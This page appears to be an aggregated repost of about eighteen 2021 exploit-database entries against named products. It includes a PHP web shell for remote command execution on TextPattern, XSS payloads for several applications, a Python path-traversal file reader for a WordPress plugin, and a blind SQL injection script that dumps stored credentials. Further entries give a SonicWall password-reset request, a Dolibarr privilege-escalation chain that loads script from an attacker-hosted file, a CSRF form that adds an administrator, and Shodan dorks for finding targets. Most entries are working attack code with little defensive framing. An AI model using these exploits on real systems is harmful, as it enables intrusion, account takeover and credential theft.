All posts by ISHACK AI BOT

  1. # Exploit Title: TextPattern CMS 4.8.7 - Remote Command Execution (RCE) (Authenticated)
     # Date: 2021/09/06
     # Exploit Author: Mert Daş [email protected]
     # Software Link: https://textpattern.com/file_download/113/textpattern-4.8.7.zip
     # Software web: https://textpattern.com/
     # Tested on: Server: Xampp

     First of all, we should use the file upload section to upload our shell. Our shell contains this malicious code:

     <?PHP system($_GET['cmd']);?>

     1) Go to the content section.
     2) Click Files and upload the malicious php file.
     3) Go to yourserver/textpattern/files/yourphp.php?cmd=yourcode

     After uploading our file, our request and response are as below:

     Request:

     GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
     Host: 127.0.0.1
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
     Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
     Accept-Encoding: gzip, deflate
     Connection: close
     Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP; PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
     Upgrade-Insecure-Requests: 1

     Response:

     HTTP/1.1 200 OK
     Date: Thu, 10 Jun 2021 00:32:41 GMT
     Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
     X-Powered-By: PHP/7.4.20
     Content-Length: 22
     Connection: close
     Content-Type: text/html; charset=UTF-8

     pc\mertdas
  2. # Exploit Title: SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path
     # Exploit Author: Mert DAŞ
     # Version: 3.11.8
     # Date: 14.10.2021
     # Vendor Homepage: https://www.solarwinds.com/
     # Tested on: Windows 10

     # Step to discover Unquoted Service Path:
     --------------------------------------
     C:\Users\Mert>sc qc CatTools
     [SC] QueryServiceConfig SUCCESS

     SERVICE_NAME: CatTools
             TYPE               : 10  WIN32_OWN_PROCESS
             START_TYPE         : 2   AUTO_START
             ERROR_CONTROL      : 1   NORMAL
             BINARY_PATH_NAME   : C:\Program Files (x86)\CatTools3\nssm.exe
             LOAD_ORDER_GROUP   :
             TAG                : 0
             DISPLAY_NAME       : CatTools
             DEPENDENCIES       :
             SERVICE_START_NAME : LocalSystem
     ---------------------------------------------

     Or:
     -------------------------
     C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
     ----------------------

     #Exploit:
     A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  3. # Exploit Title: i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)
     # Date: 04.10.2021
     # Exploit Author: Forster Chiu
     # Vendor Homepage: https://www.hkurl.com
     # Version: 2.0
     # Tested on: Chrome, Edge and Firefox
     # CVE: CVE-2021-41878
     # Reference: https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html

     As a proof of concept, an alert box can be generated with the following payload.

     Exploit PoC:

     GET /lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E HTTP/1.1
     Host: Forster
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     Cookie: PHPSESSID=7db442d0ed0f9c8e21f5151c3711973e
     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
     Accept-Language: en-gb
     Accept-Encoding: gzip, deflate
     Connection: close
  4. # Exploit Title: Support Board 3.3.4 - 'Message' Stored Cross-Site Scripting (XSS)
     # Date: 16/10/2021
     # Exploit Author: John Jefferson Li <[email protected]>
     # Vendor Homepage: https://board.support/
     # Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943
     # Version: 3.3.4
     # Tested on: Ubuntu 20.04.2 LTS, Windows 10

     POST /supportboard/include/ajax.php HTTP/1.1
     Cookie: [Agent+]
     Accept: */*
     Accept-Language: en-GB,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Content-Length: 808
     X-Requested-With: XMLHttpRequest
     Connection: close

     function=add-note&conversation_id=476&user_id=2&name=Robert+Smith&message=%3CScRiPt%3Ealert(/XSS/)%3C%2FsCriPt%3E&login-cookie=<cookie>&language=false
  5. # Exploit Title: Company's Recruitment Management System 1.0. - 'title' Stored Cross-Site Scripting (XSS)
     # Date: 17-10-2021
     # Exploit Author: Aniket Deshmane
     # Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
     # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
     # Version: 1
     # Tested on: Windows 10,XAMPP

     Steps to Reproduce:

     1) Navigate to http://127.0.0.1/employment_application and log in with a staff account.
     2) Navigate to the vacancies tab.
     3) Click on Add new.
     4) Add the payload "><img src=x onerror=alert(1)> in the Vacancy Title field.
     5) Click on Save and you are done. It's gonna be triggered when anyone visits the application.

     Request:-

     POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
     Host: 127.0.0.1
     User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
     Accept: application/json, text/javascript, */*; q=0.01
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     X-Requested-With: XMLHttpRequest
     Content-Type: multipart/form-data; boundary=---------------------------15502044322641666722659366422
     Content-Length: 931
     Origin: http://127.0.0.1
     DNT: 1
     Connection: close
     Cookie: PHPSESSID=e00mbu2u5cojpsh5jkaj9pjlfc
     Sec-Fetch-Dest: empty
     Sec-Fetch-Mode: cors
     Sec-Fetch-Site: same-origin
     Cache-Control: no-transform

     -----------------------------15502044322641666722659366422
     Content-Disposition: form-data; name="id"

     -----------------------------15502044322641666722659366422
     Content-Disposition: form-data; name="title"

     "><img src=x onerror=alert(1)>
     -----------------------------15502044322641666722659366422
     Content-Disposition: form-data; name="designation_id"

     1
     -----------------------------15502044322641666722659366422
     Content-Disposition: form-data; name="slots"

     1
     -----------------------------15502044322641666722659366422
     Content-Disposition: form-data; name="status"

     1
     -----------------------------15502044322641666722659366422
     Content-Disposition: form-data; name="description"

     -----------------------------15502044322641666722659366422
     Content-Disposition: form-data; name="files"; filename=""
     Content-Type: application/octet-stream

     -----------------------------15502044322641666722659366422--
  6. # Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read
     # Date: October 16, 2021
     # Exploit Author: nam3lum
     # Vendor Homepage: https://wordpress.org/plugins/duplicator/
     # Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]
     # Version: 1.3.26
     # Tested on: Ubuntu 16.04
     # CVE : CVE-2020-11738

     import requests as re
     import sys

     if len(sys.argv) != 3:
         print("Exploit made by nam3lum.")
         print("Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd")
         exit()

     arg = sys.argv[1]
     file = sys.argv[2]

     URL = arg + "/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../.." + file
     output = re.get(url = URL)
     print(output.text)
  7. # Exploit Title: Mitsubishi Electric & INEA SmartRTU - Reflected Cross-Site Scripting (XSS)
     # Date: 2021-17-10
     # Exploit Author: Hamit CİBO
     # Vendor Homepage: https://www.inea.si
     # Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
     # Version: ME RTU
     # Tested on: Windows
     # CVE : CVE-2018-16061

     # PoC

     # Request

     POST /login.php/srdzz'onmouseover%3d'alert(1)'style%3d'position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b'bsmy8 HTTP/1.1
     Host: **.**.**.***
     Content-Length: 132
     Cache-Control: max-age=0
     Origin: http://**.**.**.***
     Upgrade-Insecure-Requests: 1
     Content-Type: application/x-www-form-urlencoded
     User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.84 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
     Referer: http://**.**.**.***sss/login.php
     Accept-Encoding: gzip, deflate
     Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
     Cookie: PHPSESSID=el8pvccq5747u4qj9koio950l7
     Connection: close

     submitted=1&username=-- %3E%27%22%2F%3E%3C%2FsCript%3E%3CsvG+x%3D%22%3E%22+onload%3D%28co%5Cu006efirm%29%60%60&password=&Submit=Login

     # Response

     HTTP/1.1 200 OK
     Date: Wed, 08 Aug 2018 08:14:25 GMT
     Server: Apache/2.4.7 (Ubuntu)
     X-Powered-By: PHP/5.5.9-1ubuntu4
     Vary: Accept-Encoding
     Content-Length: 3573
     Connection: close
     Content-Type: text/html

     <div id='fg_membersite' class='login_form'>
     <form id='login' name='login' action='/login.php/srdzz'onmouseover='alert(1)'style='position:absolute;width:100%;height:100%;top:0;left:0;'bsmy8' method='post' accept-charset='UTF-8'>

     Reference : https://drive.google.com/file/d/1DEZQqfpIgcflY2cF6O0y7vtlWYe8Wjjv/view
  8. # Exploit Title: Mitsubishi Electric & INEA SmartRTU - Source Code Disclosure
     # Date: 2021-17-10
     # Exploit Author: Hamit CİBO
     # Vendor Homepage: https://www.inea.si
     # Software Link: https://www.inea.si/telemetrija-in-m2m-produkti/mertu/
     # Version: ME RTU
     # Tested on: Windows
     # CVE : CVE-2018-16060

     # PoC

     # Request

     GET /web HTTP/1.1
     Host: **.**.**.***
     Accept-Encoding: gzip, deflate
     Accept: */*
     Accept-Language: en
     User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
     Connection: close

     # Response

     HTTP/1.1 200 OK
     Date: Wed, 08 Aug 2018 08:09:53 GMT
     Server: Apache/2.4.7 (Ubuntu)
     Content-Location: web.tar
     Vary: negotiate
     TCN: choice
     Last-Modified: Wed, 19 Nov 2014 09:40:36 GMT
     ETag: "93800-5083300f58d00;51179459a2c00"
     Accept-Ranges: bytes
     Content-Length: 604160
     Connection: close
     Content-Type: application/x-tar

     Reference : https://drive.google.com/open?id=1QMHwTnBbIqrTkR0NEpnTKssYdi8vRsHH
  9. # Exploit Title: Company's Recruitment Management System 1.0 - 'description' Stored Cross-Site Scripting (XSS)
     # Date: 18-10-2021
     # Exploit Author: Aniket Anil Deshmane
     # Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
     # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
     # Version: 1
     # Tested on: Windows 10,XAMPP

     Steps to reproduce:-

     1) Log in with a staff account and navigate to the Vacancies tab.
     2) Click on add new vacancies. Put any random information in the other fields except description, and go to the description window.
     3) In the description field select insert link.
     5) In the Text to display field add the following payload: "><img src=x onerror=alert(1)>
     6) Click on save and you are done. It's gonna be triggered when someone opens the vacancy details.

     Request:-

     POST /employment_application/Actions.php?a=save_vacancy HTTP/1.1
     Host: 127.0.0.1
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
     Accept: application/json, text/javascript, */*; q=0.01
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     X-Requested-With: XMLHttpRequest
     Content-Type: multipart/form-data; boundary=---------------------------156186133432167175201476666002
     Content-Length: 1012
     Origin: http://127.0.0.1
     DNT: 1
     Connection: close
     Referer: http://127.0.0.1/employment_application/admin/?page=vacancies
     Cookie: PHPSESSID=ah0lpri38n5c4ke3idhbkaabfa
     Sec-Fetch-Dest: empty
     Sec-Fetch-Mode: cors
     Sec-Fetch-Site: same-origin

     -----------------------------156186133432167175201476666002
     Content-Disposition: form-data; name="id"

     -----------------------------156186133432167175201476666002
     Content-Disposition: form-data; name="title"

     Test1ee
     -----------------------------156186133432167175201476666002
     Content-Disposition: form-data; name="designation_id"

     4
     -----------------------------156186133432167175201476666002
     Content-Disposition: form-data; name="slots"

     1
     -----------------------------156186133432167175201476666002
     Content-Disposition: form-data; name="status"

     1
     -----------------------------156186133432167175201476666002
     Content-Disposition: form-data; name="description"

     <p><br><a href="http://google.com" target="_blank">"><img src="x" onerror="alert(1)"></a></p>
     -----------------------------156186133432167175201476666002
     Content-Disposition: form-data; name="files"; filename=""
     Content-Type: application/octet-stream

     -----------------------------156186133432167175201476666002--
  10. # Exploit Title: Plastic SCM 10.0.16.5622 - WebAdmin Server Access
      # Shodan Dork: title:"Plastic SCM"
      # Date: 18.10.2021
      # Exploit Author: Basavaraj Banakar
      # Vendor Homepage: https://www.plasticscm.com/
      # Software Link: https://www.plasticscm.com/download/releasenotes/10.0.16.5622
      # Version: Plastic SCM < 10.0.16.5622
      # Tested on: Chrome,Firefox,Edge
      # CVE : CVE-2021-41382
      # Reference: https://infosecwriteups.com/story-of-google-hall-of-fame-and-private-program-bounty-worth-53559a95c468

      # Exploit:

      1. Navigate to target.com/account [This holds the administrator login console]
      2. Change the URL to target.com/account/register [Here it is possible to set a new password for the administrator user]
      3. After changing the administrator's password, log in to the console, navigate to target.com/configuration/authentication and set a new password for any of the users
      4. Now navigate to target.com/webui/repos and log in with the recently changed password for the user from step 3
  11. # Exploit Title: Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)
      # Date: 18-10-2021
      # Exploit Author: Aniket Anil Deshmane
      # Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
      # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
      # Version: 1
      # Tested on: Windows 10,XAMPP

      Detail: The application is not using any security token to prevent it against CSRF. Therefore, a malicious user can add a new administrator user account by using a crafted POST request.

      CSRF POC:-

      <html>
        <!-- CSRF PoC - generated by Burp Suite Professional -->
        <body>
        <script>history.pushState('', '', '/')</script>
          <form action="http://127.0.0.1/employment_application/Actions.php?a=save_user" method="POST">
            <input type="hidden" name="id" value="" />
            <input type="hidden" name="fullname" value="Test" />
            <input type="hidden" name="username" value="Test" />
            <input type="hidden" name="type" value="1" />
            <input type="submit" value="Submit request" />
          </form>
        </body>
      </html>
  12. # Exploit Title: WordPress Theme Enfold 4.8.3 - Reflected Cross-Site Scripting (XSS)
      # Google Dork: "inurl:avia-element-paging"
      # Date: 18/10/2021
      # Exploit Author: Francisco Díaz-Pache Alonso, Sergio Corral Cristo and David Álvarez Robles
      # Vendor Homepage: https://kriesi.at/
      # Version: Enfold < 4.8.4 (all versions)
      # Tested on: Ubuntu
      # CVE : CVE-2021-24719
      # Full disclosure and PoC on: https://blog.asturhackers.es/cross-site-scripting-xss-reflejado-en-tema-enfold-4-8-4-para-wordpress

      While navigating WordPress sites with an Enfold Theme version earlier than 4.8.4 and Avia Page Builder, the string “ProofOfConcept” can be reflected literally in the pagination numbers. Moreover, the parameter “avia-element-paging” appears and can be used for crafting Google Dork based searches.

      https://[hostname]/[path]?ProofOfConcept --> This URL must include pages shown by Enfold theme

      Replacing the “ProofOfConcept” text with a Cross-Site-Scripting (XSS) payload, the page processes and executes it. This is a reflected Cross-Site-Scripting (XSS) vulnerability. Find below the URL that includes the malicious payload.

      https://[hostname]/[path]/?%2527%253E%253Cscript%253Eeval%2528atob%2528%2522Y29uc29sZS5sb2coZG9j --> This URL must include pages shown by Enfold theme

      Payload (double encoded): this payload is double encoded in the URL from:
      '><script>eval(atob("Y29uc29sZS5sb2coZG9jdW1lbnQuY29va2llKQ=="))</script>

      Payload (base64): the “atob” payload is Base64 encoded from:
      console.log(document.cookie)

      Navigating to the crafted URL, the console log displays some cookies that are used by the affected site (i.e. cookies with no “HttpOnly” flag set). However, the payload is easily configurable.
  13. # Exploit Title: myfactory FMS 7.1-911 - 'Multiple' Reflected Cross-Site Scripting (XSS)
      # Exploit Author: RedTeam Pentesting GmbH
      # Vendor Homepage: https://www.myfactory.com/
      # Version: Enfold < 4.8.4 (all versions)
      # Tested on: Ubuntu
      # CVE : CVE-2021-42565, CVE-2021-42566
      # Reference: https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms

      During a penetration test, a reflected cross-site scripting vulnerability (XSS) was found in the myfactory.FMS login form. If a user opens an attacker-prepared link to the application, attackers can run arbitrary JavaScript code in the user's browser.

      Introduction
      ============

      "With myfactory, you get a modern accounting application for your business. It covers every functionality necessary for an accounting system."
      (translated from German from the vendor's homepage)

      More Details
      ============

      The myfactory.FMS web application[0] allows users to login with a username and password. If the password is wrong, the application redirects to a URL similar to the following:

      http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=RedTeam

      The application then opens a dialogue telling the user that their username or password are wrong and uses the value of the parameter UID to prefill the login form resulting in the following source code:

      ------------------------------------------------------------------------
      <td>
      <input NAME="txtUID" VALUE="RedTeam" onkeypress="OnKeyPress(event)" placeholder="Benutzername" >
      </td>
      ------------------------------------------------------------------------

      The UID parameter gets reflected without applying any encoding to it. A similar problem arises when the login leads to an error. This introduces a new parameter named 'Error':

      http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=RedTeam_Error

      The value of the Error parameter gets appended without encoding in the javascript function mOnLoad resulting in the following code:

      ------------------------------------------------------------------------
      function mOnLoad( {
        var sParams;
        alert('Das System konnte Sie nicht anmelden.\n RedTeam_Error');
        [...]
      ------------------------------------------------------------------------

      Proof of Concept
      ================

      The XSS in the UID parameter can be triggered with the following URL:

      http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID="><script>alert("RedTeam+Pentesting")</script><span+"

      This will lead to the following HTML returned by the server:

      ------------------------------------------------------------------------
      <td>
      <input NAME="txtUID" VALUE=""><script>alert("RedTeam Pentesting")</script><span "" onkeypress="OnKeyPress(event)" placeholder="Benutzername" >
      </td>
      ------------------------------------------------------------------------

      To demonstrate the XSS via the Error parameter, the following URL can be used:

      http://www.example.com/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=');alert("RedTeam+Pentesting");//

      This will lead to the following JavaScript embedded in the HTML website returned by the server:

      ------------------------------------------------------------------------
      function mOnLoad( {
        var sParams;
        alert('Das System konnte Sie nicht anmelden.\n ');alert("RedTeam+Pentesting");//');
        [...]
      ------------------------------------------------------------------------

      Workaround
      ==========

      None

      Fix
      ===

      Install Version 7.1-912 or later.

      Security Risk
      =============

      This security vulnerability allows to execute arbitrary JavaScript code in users' browsers if they access URLs prepared by attackers. This provides many different possibilities for further attacks against these users. The vulnerability could for example be exploited to display a fake login to obtain credentials and consequently access a company's accounting information. Since attackers might be able to get access to sensitive financial data, but users have to actively open an attacker-defined link, this vulnerability is estimated to pose a medium risk.

      Timeline
      ========

      2021-05-07 Vulnerability identified
      2021-05-27 Customer approved disclosure to vendor
      2021-06-07 Vendor notified, support confirms vulnerability and implements fix. Support says vendor does not agree to a public advisory.
      2021-06-10 Vendor contacts RedTeam Pentesting, reiterates that no advisory should be released. Vendor acknowledges public release after 90 days.
      2021-10-04 Customer confirms update to fixed version
      2021-10-13 Advisory released
      2021-10-14 CVE-ID requested
      2021-10-18 CVE-ID assigned

      References
      ==========

      [0] https://www.myfactory.com/myfactoryfms.aspx
  14. # Exploit Title: Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)
      # Exploit Author: Chase Comardelle(CASO)
      # Date: October 18, 2021
      # Vendor Homepage: https://www.sourcecodester.com/php/14989/online-motorcycle-bike-rental-system-phpoop-source-code.html
      # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bike_rental_0.zip
      # Tested on: Kali Linux, Apache, Mysql
      # Vendor: oretnom23
      # Version: v1.0

      # Exploit Description:
      # Online Motorcycle (Bike) Rental System is vulnerable to a Blind Time-Based SQL Injection attack. This can lead attackers to remotely dump MySql database credentials

      #EXAMPLE PAYLOAD - [email protected]' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL;
      #EXAMPLE EXECUTION - python3 sqliExploit.py http://localhost/bike_rental/

      import requests
      import sys
      import urllib3
      import pyfiglet

      urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
      proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}

      def find_clients_usernames(url):
          clients = ""
          cookies = {'Cookie:':'PHPSESSID='}
          headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
          path = '/classes/Login.php?f=login_user'
          position = 1
          i=0
          while i <len(chars) :
              sqli = "[email protected]'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(email+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
              r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
              if r.elapsed.total_seconds() > 1:
                  clients += chars[i]
                  i=0
                  position+=1
              else:
                  i +=1
          return clients

      def find_db_usernames(url):
          users = ""
          cookies = {'Cookie:':'PHPSESSID='}
          headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
          path = '/classes/Login.php?f=login_user'
          position = 1
          i=0
          while i <len(chars) :
              sqli = "[email protected]'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(username+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
              r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
              if r.elapsed.total_seconds() > 1:
                  users += chars[i]
                  i=0
                  position+=1
              else:
                  i +=1
          return users

      def find_db_passwords(url):
          passwords = ""
          clientCount = 0
          cookies = {'Cookie:':'PHPSESSID='}
          headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
          path = '/classes/Login.php?f=login_user'
          position = 1
          i=0
          while i <len(chars) :
              sqli = "[email protected]'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
              r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
              if r.elapsed.total_seconds() > 1:
                  passwords += chars[i]
                  i=0
                  position+=1
              else:
                  i +=1
          return passwords

      def find_client_passwords(url):
          passwords = ""
          clientCount = 0
          cookies = {'Cookie:':'PHPSESSID='}
          headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}
          path = '/classes/Login.php?f=login_user'
          position = 1
          i=0
          while i <len(chars) :
              sqli = "[email protected]'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])
              r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)
              if r.elapsed.total_seconds() > 1:
                  passwords += chars[i]
                  i=0
                  position+=1
              else:
                  i +=1
          return passwords

      def create_table(users,passwords):
          for i in range(0,len(users)):
              print(users[i]," | ",passwords[i])

      def print_header():
          print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
          print("[*]     Online Motorcycle (Bike) Rental System      [*]")
          print("[*] Unauthenticated Blind Time-Based SQL Injection  [*]")
          print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")
          print("\n")
          print(pyfiglet.figlet_format(" CAS0", font = "slant" ))

      chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',
                'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',
                'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',
                'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',
                '8','9','@','#',",",'.']

      if __name__ == "__main__":
          try:
              url = sys.argv[1].strip()
          except IndexError:
              print("[-] Usage: %s <url>" % sys.argv[0])
              print("[-] Example: %s www.example.com" % sys.argv[0])
              sys.exit(-1)

          print_header()
          print("[*] RETRIEVING CREDENTIALS NOW [*]")
          dbUsernames = find_db_usernames(url)
          dbUsernames = dbUsernames.split(",")
          dbPasswords = find_db_passwords(url)
          dbPasswords = dbPasswords.split(",")
          print("[*] DATABASE CREDENTIALS [*]")
          create_table(dbUsernames,dbPasswords)
          clientUsernames = find_clients_usernames(url)
          clientsUsernames = clientUsernames.split(",")
          clientPasswords = find_client_passwords(url)
          clientPasswords = clientPasswords.split(",")
          print("[*] CLIENT CREDENTIALS [*]")
          create_table(clientsUsernames,clientPasswords)
  15. # Exploit Title: SonicWall SMA 10.2.1.0-17sv - Password Reset
      # Description: Overwrite the persistent database, resulting in password reset on reboot.
      # Shodan Dork: https://www.shodan.io/search?query=title%3A%22Virtual+Office%22+%22Server%3A+SonicWall%22
      # Date: 10/19/2021
      # Exploit Author: Jacob Baines (@Junior_Baines)
      # Root Cause Analysis: https://attackerkb.com/topics/23t9VCbGzt/cve-2021-20034/rapid7-analysis?referrer=profile
      # Vendor Homepage: https://www.sonicwall.com/
      # Version: SMA 100 Series using 9.0.0.10-28sv, 10.2.0.7-34sv, and 10.2.1.0-17sv
      # Tested on: SMA 500v using 9.0.0.10-28sv and 10.2.1.0-17sv
      # CVE : CVE-2021-20034

      curl -v --insecure "https://10.0.0.6/cgi-bin/handleWAFRedirect?hdl=../flash/etc/EasyAccess/var/conf/persist.db"
  16. # Exploit Title: Macro Expert 4.7 - Unquoted Service Path
      # Exploit Author: Mert DAŞ
      # Version: 4.7
      # Date: 20.10.2021
      # Vendor Homepage: http://www.macro-expert.com/
      # Tested on: Windows 10

      C:\Users\Mert>sc qc "Macro Expert"
      [SC] QueryServiceConfig SUCCESS

      SERVICE_NAME: Macro Expert
              TYPE               : 10  WIN32_OWN_PROCESS
              START_TYPE         : 2   AUTO_START
              ERROR_CONTROL      : 1   NORMAL
              BINARY_PATH_NAME   : c:\program files (x86)\grasssoft\macro expert\MacroService.exe
              LOAD_ORDER_GROUP   :
              TAG                : 0
              DISPLAY_NAME       : Macro Expert
              DEPENDENCIES       :
              SERVICE_START_NAME : LocalSystem
      ---------------------------------------------

      Or:
      -------------------------
      C:\Users\Mert>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

      #Exploit:
      A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  17. # Exploit Title: Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation
      # Exploit Author: Oscar Gutierrez (m4xp0w3r)
      # Date: 18/10/2021
      # Vendor Homepage: https://www.dolibarr.org/
      # Software Link: https://github.com/Dolibarr
      # Tested on: Ubuntu, LAAMP
      # Vendor: Dolibarr
      # Version: v14.0.2

      # Exploit Description:
      # Dolibarr ERP & CRM v14.0.2 suffers from a stored XSS vulnerability in the ticket creation flow that allows a low level user (with full access to the Tickets module) to achieve full permissions. For this attack vector to work, an administrator user needs to copy the text in the "message" box.

      # Instructions:
      #1. Insert this payload in the message box when creating a ticket:
      "><span onbeforecopy="let pwned = document.createElement('script'); pwned.setAttribute('src', 'http://YOURIPGOESHERE/hax.js'); document.body.appendChild(pwned);" contenteditable>test</span>
      #
      #2. Host this file (Change the extension of the file to js and remove comments) in a remote http location of your preference.
      #NOTE: The user id in /dolibarr/htdocs/user/perms.php?id=2 may vary depending on the installation so you might have to change this. In my case, I had only 2 users, user 2 being the low level user.
      #
      #3. Once an administrator user copies the text within the ticket the attack will launch.

      function read_body(xhr) {
          var data = xhr.responseXML;
          var tokenizedUrl = data.getElementsByClassName("reposition commonlink")[0].href;
          console.log(tokenizedUrl);
          return tokenizedUrl;
      }

      function escalatePrivs() {
          var url = read_body(xhr);
          var http = new XMLHttpRequest();
          http.open('GET', url);
          http.onreadystatechange = function() {
              if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
                  return;
              }
          };
          http.send(null);
      }

      var xhr = new XMLHttpRequest();
      xhr.onreadystatechange = function() {
          if (xhr.readyState == XMLHttpRequest.DONE) {
              read_body(xhr);
              escalatePrivs(xhr);
          }
      }
      xhr.open('GET', '/dolibarr/htdocs/user/perms.php?id=2', true);
  18. # Exploit Title: NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)
      # Date: 24/06/2021
      # Exploit Author: LinxzSec
      # Vulnerability: Local Denial of Service (DoS)
      # Vendor Homepage: https://www.ni.com/en-gb.html
      # Software Link: License Required - https://knowledge.ni.com/KnowledgeArticleDetails?id=kA03q000000YGQwCAO&l=en-GB
      # Tested Version: 5.3.1f0
      # Tested On: Windows 10 Pro x64

